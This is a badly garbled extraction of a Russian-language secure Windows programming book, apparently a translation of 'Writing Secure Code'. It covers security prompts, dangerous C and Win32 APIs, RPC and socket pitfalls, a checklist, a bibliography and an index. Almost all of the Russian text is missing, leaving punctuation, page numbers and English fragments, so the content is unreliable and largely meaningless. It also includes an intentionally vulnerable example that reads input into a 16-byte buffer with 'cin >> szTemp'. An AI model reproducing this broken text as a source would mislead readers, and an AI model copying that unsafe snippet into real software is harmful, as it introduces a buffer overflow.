. ,
.
13:
. SSL/TLS,
.
14: SOAP-Server
, SOAPServer
IP DNS. , ,
.
,
.
19:
SOAPServer
Micro
soft Windows .NET Server 2003. , :
, SOAPServer .
,
.
, ,
, , .
, , .
, .
?
, ,
, ().
.
,
,
, .
614
IV
. 241
.
. 241.
, *
, .
, Yes,
No. (. 242),
, . 241.
. 242.
**
? ,
. , Microsoft Internet Explorer
, No.
, ,
, . : ,
. , .
:
, .
,
, .
, .
* :
. . ?
** :
?
24
615
, ,
, ,
, .
. . Windows
, ,
.
, ,
.
, , Windows ,
. 243.
. 243. ,
*
,
, . :
( );
(
);
( ,
).
.
, .
Microsoft Windows,
, , .
, Caps Lock**.
,
, .
,
, .
,
,
, .
, ,
* . .
Caps Lock.
* Windows
. . .
616
IV
.
(. 224) .
. 244.
No,
, . ,
, . ,
, .
. ? Yes?
No?
,
.
, . , .
! ,
No ,
Yes .
, Yes,
. , ,
, .
,
.
(informed consent).
,
,
:
24
617
,
;
;
, ;
,
;
, ?
, ;
? ?
.
. ;
,
. ,
,
.
. 245
, .
. 245.
*
* .
, ,
, Acme Incorporated.
Windows ,
Acme Incorporated. ,
, Acme
Incorporated.
Windows
,
. , ,
.
?
Yes, No. . .
618
IV
, ,
, .
.
,
.
, .
, .
, .
,
, (progressive disc
losure). ,
.
,
().
. 246
.
. 246. ,
, .
.
(
, . 241).
, . 241 ,
. ,
(. 247).
24
. 247.
619
, ,
, , .
, . , .
, ,
, . ,
,
. , ,
( ),
, .
: ?.
.
, , ,
.
:
, , ,
:
.
,
, ?
,
. ,
. ,
.
* ,
. ,
.
,
.
,
.
? . .
620
IV
, ,
, ,
. ?
. , ,
.
, Content (
) Internet Options ( ) Internet
Explorer, ,
. Windows Microsoft ,
, .
.
.
Security () Internet
Options Internet Explorer (. 248).
. 248.
,
(,
) , .
,
, .
,
.
.
24
621
, ,
,
. ,
. :
;
;
;
;
, , ;
;
;
;
;
?
, ,
.
, . ,
, . ,
,
.
, ,
, , ,
.
,
:
,
;
,
;
,
;
,
, ;
622
IV
,
;
, ,
.
.
,
,
.
, ,
, ,
.
. Windows XP Windows 2000,
Control Panel ( ) Administrative Tools (
) Local Security Policy (
). ,
( ) .
Local Policies ( ) Security Options (
). , ? ,
Do not Allow Anonymous Enumeration of Accounts and Shares (
) Network
Access ( ). ? ?
?
Help (), Security
Settings ( ),
.
.
, ,
.
, .
. ,
1000 ( ).
.
,
Active Directory,
.
,
.
24
623
,
, ,
.
.
, :
. , ,
,
.
,
.
API-
API .
, , ,
,
. , .
5 ,
.
,
.
(Dave Cutler), Microsoft Windows NT,
, ,
. , .
,
. :
, ,
, !
(
) . ,
, ,
.
, .
,
, .
, ,
. ,
API-
627
, ,
.
! , ,
.
,
.
API-,
C
, .
.
strcpy, wcscpy, lstrcpy, _tcscpy _mbscpy
, null
. ,
.
n ( n) strsafe.
! n strsafe
;
.
strcat, wcscat, lstrcat, _tcscat _mbscat ,
.
strncpy, wcsncpy, _tcsncpy, lstrcpyn _mbsnbcpy ,
.
null .
strncat, wcsncat, _tcsncat _mbsnbcat ,
, , .
,
.
memcpy CopyMemory
, Length.
. _memcpy,
,
.
sprintf swprintf
. ,
628
.
StringCchPrintf.
_snprintf _snwprintf
. ,
( ) .
StringCchPrintf.
printf printf, _sprintf, _snprintf, vprintf, vsprintf
Unicode. ,
. ,
Unicode %s
,
, .
WideCharToMultiByte.
,
%s (, sprintf(szTemp, "%d, %s", dwData, szString),
, strcpy.
_snprintfI StringCchPrintf.
strlen, _tcslen, _mbslen wcslen
, .
,
, .
gets .
, gets .
! fgets.
getc .
scanf("%s",), _tscanf wscanf gets,
scanf, _tscanf, wscanf %s,
. , , ,
%32s, fgets.
(>>) STL
. ,
. , stdin
(cin) szTemp, 16 ,
.
#include "istream"
void main(void) {
char szTemp[16];
cin >> szTemp;
}
, gets.
cin.width.
MultiByteToWideChar ,
Unicode , . ,
. :
API-
629
WCHAR wszName[NAME_LEN];
MultiByteToWideChar(,,,,sizeof(wszName));
sizeof(wszName)/sizeof(wszName[0])
NAME_LEN, ,
.
_mbsinc, _mbsdec, _mbsncat, _mbsncpy, _mbsnextc, _mbsnset, _mbsrev, _mbsset,
_mbsstr, _mbstok, _mbccpy _mbslen
( )
,
.
/ , isleadbyte, _ismbslead _ismbs
trail. _mbbtype.
API-,
CreateDirectory, CreateEvent, CreateFile, CreateFileMapping, CreateHardLink,
CreateJobObject, CreateMailslot, CreateMutex, CreateNamedPipe, CreateSemap
hore, CreateWaitableTimer, MoveFile ,
. API, , ,
(namesquatting).
. , ,
, .
,
c:\temp , ,
. , ,
, ,
, , .
,
, Microsoft Windows 2000 Documents and
Settings.
, .
( ) CREA
TE_NEW ,
, .
, ,
.
. ,
, , !
UNIX
,
Windows. , Windows
, ,
,
(Terminal Services).
630
, ,
, ,
. ,
.
FILE_FLAG_FIRST_PIPE_INSTANCE.
: Windows 2000 SP1
(. 23).
:
,
, .
, , .
.
.
RPC
,
, . , ,
,
.
API-,
. ,
,
,
.
CreateProcess(NULL,), CreateProcessAsUser CreateProcessWithLogon.
, .
null, ,
. , c:\Program Files\MyApp\My
App.exe, c:\Prog
ram.exe. :
.
WinExec ShellExecute , CreateProcess(NULL,),
.
LoadLibrary, LoadLibraryEx SearchPath Windows
.
DLL, (, file.dll c:\dir\dir\file.dll),
, ,
.
.
: DLL ,
, ,
. DLL
API-
631
, DLL GetWindowsDirectory.
, .
Windows XP SP1 Windows .NET Server 2003
, .
.
,
(scroll bar). ,
.
, ( ) (hWnd)
SendMessage.
?
TB_GETBUTTONTEXT, LVM_GETISEARCHSTRING TVM_GETISEAR
CHSTRING ;
, lParam NULL, .
TTM_GETTEXT ;
, 80 .
.
CB_GETLBTEXT, CB_GETLBTEXTLEN, SB_GETTEXT, SB_GETTEXTLENGTH, SB_GET
TIPTEXT, LB_GETTEXT LB_GETTEXTLEN
GETTEXTLENGTH, .
:
,
. .
(ToolTip) SB_GETTIPTEXT.
ES_PASSWORD
(). ,
GetWindowText SetWindowText,
. 9.
API-
,
.
,
, SYSTEM .
.
, .
: RpcImpersonateClient, ImpersonateLoggedOnUser, CoImpersonate
Client, ImpersonateNamedPipeClient, ImpersonateDdeClientWindow, ImpersonateSecurity
Context, ImpersonateAnonymousToken, ImpersonateSelf SetThreadToken.
632
API-, DoS-
API
, .
InitializeCriticalSection EnterCriticalSection
, ,
. InitializeCriticalSection
AndSpinCount. : EnterCriticalSection Windows XP,
Windows .NET Server . ,
. ,
.
,
LeaveCriticalSection.
. C++
, LeaveCriticalSection
.
_alloca ,
, ,
! ,
, , .
_alloca, , A2OLE, T2W, W2T,
T2COLE, A2W, W2BSTR A2BSTR.
API-
633
_alloca:
,
.
, _resetstkoflw ;
, . .
#include "malloc.h"
#include "windows.h"
...
void main(int argc, char **argv) {
try {
char *p = (char*)_alloca(0xfffff);
} __except(GetExceptionCode() == STATUS_STACK_OVERFLOW) {
int result = _resetstkoflw();
}
}
TerminateThread TerminateProcess
. TerminateThread. ,
, , .
Platform SDK:
TerminateThread ,
. TerminateThread,
,
,
.
TerminateThread
. TerminateProcess
, DLL,
ExitProcess,
. , UNIX: TerminateProcess
, . Win32
.
API-
,
.
, .
, ,
,
TCP.
bind , INADDR_ANY ( )
. 15.
634
recv ,
. 1,
( ) 0,
. recv
. recv
.
WSAEventSelect. ,
.
send , .
, , send
. connect send.
, TCP
, send
. ,
, .
NetApi32
Windows. :
NetUserGetInfo, NetShareEnum . , .
, , ,
45, . :
SMB (Server Message Block)
, Microsoft, .
, Microsoft
, NULL. ,
,
.
API-
API, .
IsBadReadPtr, IsBadWritePtr, IsBadCodePtr, IsBadStringPtr, IsBadHugeReadPtr
IsBadHugeWritePtr IsBadxxxPtr
: .
16 Windows,
.
NULL.
. , .
,
.
, ,
STATUS_ACCESS_VIOLATION.
, , ,
, !
, , ,
. IsBadWritePtr
API-
635
. , , ,
. Windows,
.
! ,
.
, IsBadWritePtr !
CopyFile MoveFile ,
ACL. , CopyFile, ACL
, , ,
MoveFile, ACL. ,
; CLSCTX_REMOTE_SERVER.
,
,
,
.
!
?
!
, .
, ACL.
, .
.
, ,
.
,
.
!
exploit.
!
, !
, .
637
!
! ! ,
, ,
. ,
, , , . ,
!
(scripts)
RPC,
,
(script kiddies), .
.
, :
.
,
Perl,
, ! ,
!
.
, ,
,
, !
?
. :
, , !
, , .
, ,
. ,
.
. ,
, ,
, .
: ,
!
!
: ! , :
! :
. .
, , ,
, .
, exploit,
( ) .
638
,
, .
,
.
, .
,
, .
, .
, , .
:
. , ,
.
.
, . .
, , ,
!
: ,
.
: *.
,
: .
,
. ,
:
;
.
, , ,
.
, ,
.
,
.
, .
, .
, ACL
Windows NT/2000/XP
(ACL). , ACL
* 28 373
. . .
639
. ACL
.
ACL. ,
ACL , Everyone ().
, ( )
, ( ).
ACL Everyone ,
.
,
. Microsoft.
Web , ,
. ,
. ! ,
.
,
Web. .
,
HTTP 80, .
,
Web!
,
Web.
,
, SSL/TLS
HTTP. .
,
.
.
! ,
, , !
Boeing 747400 ?
, ! , , ,
( , ), ,
. ? , .
, ,
, .
.
, ,
,
.
,
. ,
640
,
. .
, ,
. 45
, . 20
, ,
!
:
(open source).
, ,
, .
, ,
. ,
Microsoft: , .
,
, ! !
, ,
, :
. :
, ;
, ;
, ;
;
.
: , ,
,
. , ,
.
IIS 5, IIS 6
;
. , ,
, !
,
.
: ?
: !
: ?
641
: ,
.
: , , , ?
.
,
,
! .
. ,
.
. ,
.
,
. , , !
.
,
. .
, .
!
, ,
, . ...
,
. ,
, ,
.
,
. , .
, ,
, , .
,
, .
, !
exploit-
, ,
. :
30 , exploit,
10 .
, ,
,
. . ,
642
. ,
, ,
,
999 999 . :
,
, . , ,
.
, .
, ,
. , 99 100
,
. , ,
,
, ?
!
, .
, !
! . ,
, .
,
! ,
, : Notepad .
,
. .
,
, .
( Security Templates)
, ,
.
,
.
, BugTraq
NTBugtraq
3, 7
ActiveX,
16
.
,
23
. . .
644
()
23
23
22
23
24
, ,
. : , ,
, .
, ,
. , :
,
.
, ( Security
Templates) ,
, ,
.
RTC1
( Visual C++ .NET)
10
. . .
646
()
Strsafe.h
DACL
, DACL
(NULL)
Everyone ()
14
( PWLEN + 1,
, PWLEN
LMCons.h 256)
23
( ),
23
NTLM
SSPI ( Negotiate)
16
23
CreateProcess
NULL,
23
, ,
17
24
23
11
,
(, COM1, PRN, .)
11
23
HKLM
C:\Program Files
GENERIC_ALL,
IP,
0 INADDR_ANY
15
647
()
( ),
API
23
7, 23
23
Web
Web
13
SQL
12
SQL Server sa
12
ISAPI IIS 5
13
Web
13
eval
13
REFERER
13
23
RPC
IDL /robust
[range]
16
RPC
16
16
16
16
(NULL)
16
16
RPC
16
16
648
ActiveX,
,
16
SiteLock
16
( ,
DLL, , .)
memset ZeroMemory
. ,
, SecureZeroMemory
CryptoAPI
System.Security.Cryptography
RC4
,
RC4
( 128 ,
40)
FXCop
18
XML
18
, ,
18
, ,
18
18
RequestMinimum
18
RequestRefuse
18
RequestOptional
,
18
, ,
18
649
()
18
Assert RevertAssert
18
, ,
18
Assert
PermitOnly Deny. ,
18
LinkDemand .
18
18
SuppressUnmanagedCodeSecurityAttribute
18
18
( Security Templates)
,
.
,
.
19
SQL,
12, 19
2
SafeDllSearchMode Windows XP
Microsoft Windows .NET Server 2003
11
,
,
,
651
()
,
,
,
ActiveX,
, ,
16
.
,
23
,
:
.
, ,
, ,
. ,
.
,
.
, ,
, .
, ,
, .
,
.
,
. ,
, .
,
.
, .
654
, ,
, , ,
,
.
OSI (Open Systems Interconnection).
8. Friedl, Jeffrey E. F. Mastering Regular Expressions. 2d ed. Sebastopol, CA:
OReilly & Associates, 2002.
.
, Perl .NET Framework.
, ,
.
9. Garfinkel, Simson, and Gene Spafford. Practical UNIX & Internet Security.
2d ed. Sebastopol, CA: OReilly & Associates, 1996.
, ! ,
UNIX,
.
UNIX,
(Department of Defense),
Rainbow Series.
10. Garfinkel, Simson, and Gene Spafford. Web Security & Commerce. Sebas
topol, CA: OReilly and Associates, 1997.
Web
.
11. Gollmann, Dieter. Computer Security. New York: Wiley, 1999.
, Funda
mentals of Computer Security Technology. ,
, Microsoft Windows NT, UNIX
Web.
12. Grimes, Richard. Professional DCOM Programming. Birmingham, U.K.: Wrox
Press, 1997.
DCOM, , ,
.
13. Howard, Michael, et al. Designing Secure WebBased Applications for Micro
soft Windows 2000. Redmond, WA: Microsoft Press, 2000.
Web,
. , ,
Windows 2000 .
14. LaMacchia, Brian et al. .NET Framework Security. Reading, MA: Addison
Wesley, 2000. ,
. ,
.NET.
15. Lippert, Eric. Visual Basic .NET Code Security Handbook. Birmingham, UK:
Wrox Press, 2002. .NET.
, ,
.
655
16. Maguire, Steve. Writing Solid Code. Redmond, WA: Microsoft Press, 1993.
.
,
. ,
,
, ,
.
, , ,
,
.
17. McClure, Stuart, and Joel Scambray. Hacking Exposed: Windows 2000. Ber
keley, CA: Osborne/McGrawHill, 2001. Win
dows 2000 ,
. Win
dows 2000 ,
Windows, .
, Windows 2000,
, .
18. McClure, Stuart, Joel Scambray, and George Kurtz. Hacking Exposed: Net
work Security Secrets and Solutions. 2nd ed. Berkeley, CA: Osborne/McGraw
Hill, 2000. , ,
, !
Netware, UNIX, Windows 95/98 Windows NT.
,
.
.
19. Menezes, Alfred J. et al. Handbook for Applied Cryptography. Boca Raton,
FL: CRC Press, 1997. ,
.
.
20. National Research Council. Trust in Cyberspace. Edited by Fred B. Schneider.
Washington, D.C.: National Academy Press, 1999.
,
,
, .
21. Online Law. Edited by Thomas J. Smedinghoff. Reading, MA: AddisonWesley
Developers Press, 1996.
, ,
, , ,
, . ,
.
22. Ryan, Peter, and Steve Schneider. Modelling and Analysis of Security Proto
cols. London, England: Pearson Education Ltd, 2001.
, .
656
,
. ,
.
23. Schneier, Bruce. Applied Cryptography: Protocols, Algorithms, and Source
Code in C. 2d ed. New York: Wiley, 1996. ,
. , :)?
24. Security Protocols. Edited by Bruce Christianson, et al. Berlin: Springer, 1998.
,
. :
,
.
25. Shimomura, Tsutomu, and John Markoff. Takedown: The Pursuit and Cap
ture of Kevin Mitnick, Americas Most Wanted Computer OutlawBy the
Man Who Did It. New York: Hyperion, 1996.
,
Well, Sun Microsystems . ,
The Cuckoos Egg, , , .
26. Solomon, David A., and Mark Russinovich. Inside Microsoft Windows 2000.
Redmond, WA: Microsoft Press, 2000.
Inside Windows NT.
, ,
,
. Windows NT 1993 .
SDK ()
.
( ,
, ,
), , ,
.*
27. Stallings, William. Practical Cryptography for Data Internetworks. Los
Alamitos, CA: IEEE Computer Society Press, 1996.
. ,
.
, , DES, IDEA,
SkipJack, RC5, , ,
, SNMP, .
28. Stallings, William. Cryptography and Network Security: Principles and
Practice. Englewood Cliffs, NJ: Prentice Hall, 1999.
,
, , S/MIME, SET, SSL/TLS, IPSec,
* : . ., Microsoft
Windows 2000. . .: ; .:
, 2001.
657
PGP Kerberos. ,
Applied Cryptography: Protocols, Algorithms, and Source Code in C,
.
29. Stevens, W. Richard. TCP/IP Illustrated, Volume 1: The Protocols. Reading,
MA: Addison Wesley, 1994. ,
IP. ,
. ,
.
30. Stoll, Clifford. The Cuckoos Egg. London: Pan Macmillan, 1991.
, , ,
,
, .
.
31. Summers, Rita C. Secure Computing: Threats and Safeguards. New York:
McGrawHill, 1997. , ,
. ,
.
32. The Unicode Consortium. The Unicode Standard, Version 3.0. Reading, MA:
AddisonWesley, 2000. ( www.uni
code.org.) , ,
, ! ,
, Unicode
.
33. Viega, John and McGraw Gary. Building Secure Software. Reading, MA: Addi
sonWesley, 2001. UNIX ,
. ,
UNIX, .
Windows.
!
34. Whittaker, James A. How to Break Software: A Practical Guide to Testing.
Reading, MA: AddisonWesley, 2002.
. ,
, .
,
.
35. Zwicky, Elizabeth, et al. Building Internet Firewalls. 2d ed. Sebastopol, CA:
OReilly & Associates, 2000. ,
,
. , ,
. Windows
, .
3
3DES 243, 247
3DES (TripleDES)
290
A
access control entry . ACE
Access Control List . ACL
ACE (access control entry) 98,147,
151, 153, 154, 155, 159, 160, 164,
166, 169, 180
ACK 398
ACL (Access Control List) 49, 97, 98,
147, 149, 150, 152, 153, 154, 155,
166, 170, 187, 188, 190, 262, 296,
317
ACE 164
ACE 164
155
Active Server Pages . ASP
Active Template Library . ATL
ActiveX 440, 441, 442, 443
activity diagram . ,
B
Back Orifice 179
Basic authentication
. ,
bind .
bit flip . ,
blanket . ,
.
bug .
C
C Runtime . CRT
canonicalization .
CAPICOM 242, 254
Cartesian join .
chokepoint .
Cipher 234
loaking .
CLR (Common Language Runtime)
171, 254, 282, 463, 472
Code Access Security . CAS
code diffs . ,
code point .
COM (Component Object
Model) 411, 440
COM Internet Services
. COM
COM+ 172
combining character .
command shell .
connection point .
659
D
DACL (Discretionary Access Control
List) 147, 151, 158, 160, 169, 180,
398
167, 169
Damage potential . ,
Data Encryption Standard . DES,
. DES
data flow diagrams . DFD
data fork . ,
Data Protection API . DPAPI
DCE (Distributed Computing
Environment) 411
DCOM (Distributed COM) 99, 103,
257, 411, 432, 434, 435, 436
DDoS (distributed denial of service)
. , ,
dead code . ,
dead store elimination .
declarative permission
. ,
defacement . ,
Web
Denial of Service (DoS) . ,
DES (Data Encryption Standard) 23,
231, 243, 244, 247
DFD (data flow diagrams) 64, 75,
82, 83
DHTML (Dynamic HTML) 357
dictionary attack . ,
Digest authentication .
,
digest function . ,
Discoverability . ,
Discretionary Access Control List
. DACL
E
EFS (Encrypting File System) 99
Elevation of privilege . ,
Encrypting File System . EFS
ephemeral . ,
exception handler clobbering
. ,
Exploitability . ,
F
factoring . ,
FAT 290
fault tree .
FileMon 217
filtering .
fork .
FTP 154
FxCop 466
G
GAC (global assembly cache)
GNU C 279
469
660
H
hard link . ,
hash function . ,
HashBased Message Authentication
Code . HMAC
heap overflow . ,
HFS 323
HFS+ (Hierarchical File System
Plus) 314
HMAC (HashBased Message
Authentication Code) 250
honeypot .
HTML 58, 359, 363, 364
HTTP (Hypertext transfer
protocol) 5, 77, 154, 355, 371
HTTPS 96
Hypertext transfer protocol
. HTTP
I
I18N 378, 380
IAS (Internet Authentication
Service) 97
ICMP (Internet Control Message
Protocol) 462
ID 125
125, 391, 448
125
IDEA 243
IETF (Internet Engineering Task
Force) 99
IIS (Internet Information Services) 5,
95, 98, 132, 154, 173, 179, 317,
321, 324, 364, 485
IMAP (Internet Message Access
Protocol) 94
imperative permission
. ,
impersonation .
index out of range . ,
Information disclosure
. ,
J
JavaScript 58
JIT 477
JScript 242, 329
K
Kerberos 23, 92, 95, 419, 420
keyed hash .
L
LAN Manager 54
LDAP 94, 97
linear congruential function
. ,
M
MAC (message authentication code)
92, 99, 100, 249, 253, 374
mailslot .
malware .
maninthemiddle . ,
marsalling .
maximum segment lifetime . MSL
message authentication code
. MAC
MFC (Microsoft Foundation
Classes) 140
Microsoft Interface Definition
Language . MIDL
Microsoft JScript 152
Microsoft Transaction Server 435
Microsoft Visual Basic Scripting
Edition . VBScript
MIDL (Microsoft Interface Definition
Language) 416
MSDOS 314
MSL (maximum segment
lifetime) 399
mutex .
N
named pipe . ,
Napster 313
National Language Support . NLS
Negotiate 95
NetBIOS 97, 322, 460
NLS (National Language
Support) 378
NT LAN Manager . NTLM
NTFS 317
NTLM (NT LAN Manager) 93, 95, 96,
419, 420
NULL DACL . DACL,
O
OBJREF (object reference)
.
offbyone error . ,
ONC (Open Network
Computing) 411
661
P
parameterized command
.
PasswordBased Key Derivation
Function #1 . PBKDF1
patch .
PBKDF1 (PasswordBased Key
Derivation Function #1) 261
PGP (Pretty Good Privacy) 103
Ping of Death . , ping
plugin .
pointer subterfuge . ,
poisoning .
POP3 (Post Office Protocol 3) 94
port scanning .
promiscuous mode . ,
protocol sequences
.
PublicKey Cryptography
Standard . PKCS #5
Q
QoS (quality of service)
.
662
R
RADIUS (Remote Administration Dial
In User Service) 93, 97
RC4 243
register attack . ,
Regmon 217
regression bug .
Repudiation . ,
resource fork . ,
restricted token . ,
reverse engineering .
RivestShamirAdleman . RSA
RPC(Remote Procedure Call) 48, 99,
103, 257, 411, 412, 413, 415, 416,
421, 424, 428, 429
48
461
412
RPC endpoint mapping service
. RPC,
RPC runtime . RPC,
S
S/MIME (Secure/Multipurpose
Internet Mail Extensions) 103
SACL (System Access Control List)
151, 158, 160, 267
safe for initialization (SFI) . ,
,
salt .
SAM (Security Account Manager)
318, 339
Schannel 95
SCM (Service Control Manager) 187
script .
SDDL (Security Descriptor Definition
Language) 159162
Secure Sockets Layer . SSL
Secure/Multipurpose Internet Mail
Extensions . S/MIME
SecureIIS 321
Security Account Manager . SAM
Security Configuration Editor
.
security descriptor .
Streams 317
strict handle .
,
Strings 234
strong named assembly .
SubSeven 179
superuser .
surrogate pair .
symbolic link (symlink) . ,
SYN flood .
SYN
System Access Control List . SACL
663
system entropy .
T
Tampering with data . ,
TCB (Trusted Computing Base) 185
TCP (Transmission Control
Protocol) 10, 390, 391, 404
TCP/IP 54, 99, 390
Terminal Server .
threat model . ,
threat target .
threat tree . ,
throttling .
TLS (Transport Layer Security) 57,
94, 95, 96, 99, 102, 257, 355, 375,
390
token .
TransactSQL 349
Transmission Control Protocol
. TCP
Transport Layer Security . TLS
truncation error . ,
Trusted Computing Base . TCB
trustworthy computing .
U
UDP 390, 391, 408, 462
UDP bomb . , UDP
UID (User ID) 125
UML (Unified Modeling
Language) 64, 153
UNC (Universal Naming
Convention) 319
Unicode 130, 132, 304, 327, 374,
377, 378, 380, 386, 387
Unified Modeling Language . UML
Universal Naming Convention
. UNC
unsigned short . ID,
UPN (user principal name) 339
664
usability . ,
USB 472
User ID . UID
user principal name . UPN
UTF8 325, 326, 378
UTF16 378
UTF32 378
V
VBScript (Microsoft Visual Basic
Scripting Edition) 152, 231, 309,
329
VTable hijacking . ,
VTable
W
waterfall approach .
,
Web 355
Webbased Distributed Authoring and
Versioning . WebDAV
WebDAV (Webbased Distributed
Authoring and Versioning) 320
window station .
X
XML 481
XOR 242, 243, 244, 290
XSLT (XSL Transformation) 485
XSS (crosssite scripting) . ,
Z
zeroday attack
. ,
92, 97
. RSA
74
DoS 417
DS (Denial of Service) 186
JScript 369
ping 448
UDP 447
259
SQL 344
144
328
VTable 144
144
294,
298, 355, 359, 360, 368, 480
328
144
258
89
45, 72, 92,
447
72
248
144
144
398
185
391
239, 357,
371
54, 96
144
178
232
477
Web
178
353
353
100, 169
261
92, 93, 417
IPSec 93, 94, 97
Kerberos 94
Kerberos v5 93, 96
Microsoft Passport 93, 94, 95
NTLM 93, 94, 96
665
.
ACE
58
. CAS
3
227
361
55
Microsoft Visual C++ 7 . CRT
226
405
74, 80, 179, 314, 321, 323,
362, 366, 412
323
323
323
178
FunLove 179
ILoveYou 179
W32.Bolzano 179
186
178
223
. GAC
85
483
79
74
487
156,
158, 168, 169
278
64
. DFD
. LSA
. SCM
6
192
100
55
. ID
. SID
202
. UID
. AppID
. DACL, . DACL
441
COM 193
ICommandWithParameters 349
IDispatch 441
IDisposable 290
IHttpModule 94
IObjectSafety 444
IPersist 441
ISecurityExample 438
ISerializable 483
IUnknown 441
UsbFileStream 472
398
HttpRequestValidationException
367
PolicyException 470
SecurityException 476
BadStringBuf 122
CAtlRegExp 310
666
CcryptRandom 228
CCryptRandom 228
CString 140
DataProtection 286
ErasableData 288
FileIOPermission 474
FileStream 485
FormsAuthenticationModule 94
PassportAuthenticationModule 95
Password 290
PrincipalPermission 171
RNGCryptoServiceProvider 230
SecurityPermission 474
SqlCommand 349
string 140
System.IO.File 476
UserInput 310
479
222, 250
3DES 235
DSA 236
RSA 235
235
235
235
100, 235, 237
235
236
239
100, 235
235
237
235, 237
231
234
223, 261
237
235
237
. MAC
441
441
36
44
479
277
283
36
37
288, 463
HTML 328
325
378
348
110
. NLS
139
434
92
99
(
) 296
. CSP
222
258
111, 118
. SAM
. MSL
186, 187, 188, 197, 214
199
187, 199, 201,
203, 464
222
414
154, 170
438
IclientSecurity::SetBlanket 439
Idispatch::Invoke 440
InheritanceDemand 480
Init 311
IsCallerInRole 172
Iunknown::AddRef 433
LinkDemand 476, 477
MyWin32Funtion 478
PermitOnly 476
Print 442
Release 433
Server.HTMLEncode 362
SetKey 480
Validate 311
. RPC
21
21
247, 259, 261
151, 170
437
439
83
. CLR
document.cookie 357
FileSystemObject 152
IAccessControl 437
IserverSecurity 439
PrincipalPermission 171
RegExp 309
SqlConnection 352
Utilities 230
71, 74, 78, 84, 85, 86
440
101
435
214
74
DoS 72
DREAD 79, 81, 90
STRIDE 71, 81, 101
73, 74, 77, 79, 81, 87, 88,
89
84, 85, 86
79, 92, 102
667
61, 78, 90
60
72, 92, 258
DNS 72
78
72, 92
73, 92
DNS 72
71,
92, 258
72,
75, 92
258
90
78
79
msize 141
sizeof 141
415, 425
426
422
236
. UPN
. SPN,
. SPN
357
Unicode 132
125
116
123
79
125
10
16
SYN 404
108, 112, 125, 132, 372,
378
118
109
357
668
(detached)
254
414, 431
67
244
131, 313, 321, 329
97, 98, 101, 180, 187,
197
Bypass Traverse hecking 206
SeAssignPrimaryTokenPrivilege
185, 187, 193, 210, 213
SeAuditPrivilege 213
SeBackupPrivilege 181, 184, 192,
213
SeChangeNotifyPrivilege 186, 203,
211, 214
SeCreatePagefilePrivilege 210, 213
SeCreatePermanentPrivilege 210,
213
SeCreateTokenPrivilege 213
SeDebugPrivilege 184, 193, 210,
213, 258
SeEnableDelegationPrivilege 214
SeImpersonatePrivilege 214
SeIncreaseBasePriorityPrivilege
210, 213
SeIncreaseQuotaPrivilege 185,
193, 210, 213
SeIncreasQuotaPrivilege 187
SeLoadDriverPrivilege 185, 210,
213
SeLockMemoryPrivilege 193, 210,
213
SeMachineAccountPrivilege 193,
213
SeManageVolumePrivilege 210
SeProfileSingleProcessPrivilege 210,
213
SeRemoteShutdownPrivilege 186,
192, 214
SeRestorePrivilege 184, 213
SeSecurityPrivilege 192, 193, 210,
213
SeShutdownPrivilege 192, 210, 213
SeSyncAgentPrivilege 214
SeSystemEnvironmentPrivilege
210, 213
SeSystemProfilePrivilege 213
71
64
20
4
RegularExpressions 301
System.EnterpriseServices 287, 288
System.Net 376
System.Runtime.InteropServices
283
System.Runtime.Serialization 487
System.Security.Cryptography 243,
463
System.Security.Cryptography.X509
Certificates 254
System.Text.RegularExpressions
308, 352
System.Xml.Xsl 485
. HTTP
. IPP
470
470
EmailAlertPermission 473, 474
EnvironmentPermission 480
FileIOPermission 470, 471, 473,
485
PasswordPermission 477
PrivateKeyPermission 480
ReflectionPermission 476
RequestMinimum 470
SerializationFormatter 487
SocketPermission 474
UnmanagedCode 474
471
669
471
97, 98
304, 308,
309, 310, 330, 331, 370
162
(
) 75, 76
93
78, 84, 85, 86
80
80
,
80
79
80
79
89
170, 171, 172, 173
469
287, 467
481
document.cookie 364
innerHTML 364
innerText 362, 363
location.href 360
location.search 360
SecurityPermissionFlag.Assertion
473
155, 166
483, 487
75
348
11
. SACL
5
96
Application_OnPreSendRequest
Headers 365
onactivate 359
onclick 363
onload 359
onmouseover 359
189, 390
380
. AL
314
438
314
cookie 278
11, 125
380
4, 10
51
440
170, 174
( )
179
178,
278
. RPC
166
. UNC
180, 188
308
125
93, 171,
180
92, 100
accept 400
AddAccessAllowedACE 166
AddAccessAllowedAceEx 166
AddAccessAllowedACEEx 166
AddAccessAllowedObjectAce 166
AllocateUserPhysicalPages 193,
281
BadFunc 121
bind 391
BroadcastSystemMessage[Ex] 192
close 398
CloseFileByID 427
closesocket 401
CoInitializeSecurity 435, 437, 438
670
GetUserNameEx 340
GetVersionEx 210
GetVolumeInformation 152
HandleInput_Strncpy2 137
HeapAlloc 276
HeapCreate 276
HeapSize 276
HttpRequest.Cookies 367
HttpRequest.Form 367
HttpRequest.QueryString 367
ImpersonateLoggedOnUser 203
inet_ntoa 140
InitializeCriticalSection 459
InitiateSystemShutdown[Ex] 192
IsBadExtension 299
IsNLSDefinedString 380, 381
IsTokenResticted 205
LCMapString 379, 381
LogonUser 95, 185, 192
LsaLookupSids 412
LsaRetrievePrivateData 189, 264,
268
LsaStorePrivateData 189, 264, 268
lstrcat 133
lstrcpy 133
lstrcpyn 133, 135
main 117, 121, 455
malloc 111, 169
Message 420
MultiByteToWideChar 131, 336,
378, 381, 382
NetJoinDomain 193
NetLocalGroupDel 193
NetUserAdd 193
OpenEventLog 192
OpenFileByID 427
OpenIDFile 427
OpenProcessToken 197
PostMessage 192
PrinterOperations 425
printf 111
PrintMessage 128
PrivilegeCheck 200
quotename 349
rand 223
ReadFileByID 427
ReadProcessMemory 193
RegisterLogonProcess 192
RegQueryValueEx 148, 150
RevertToSelf 200
RpcBindingInqAuthClient 419, 420
671
92
249, 250
99
346
sp_executesql 350
sp_GetName 346
utl_file 348
xp_cmdshell 348
259
253
92, 99
243
244
243, 244
243
. EFS
225
37
. UML
. SDDL
320
,
Secure Windows Initia
tive, ,
,
,
.
Microsoft.
. , ,
Mic
rosoft, , .
, ,
Security Stra
tegies Microsoft,
Microsoft.
Microsoft.
Microsoft ,
Windows NT
Internet Scanner Internet Security
System. 1998 .
. ,
, ,
, ,
.
, , , , ,
, , .
,
.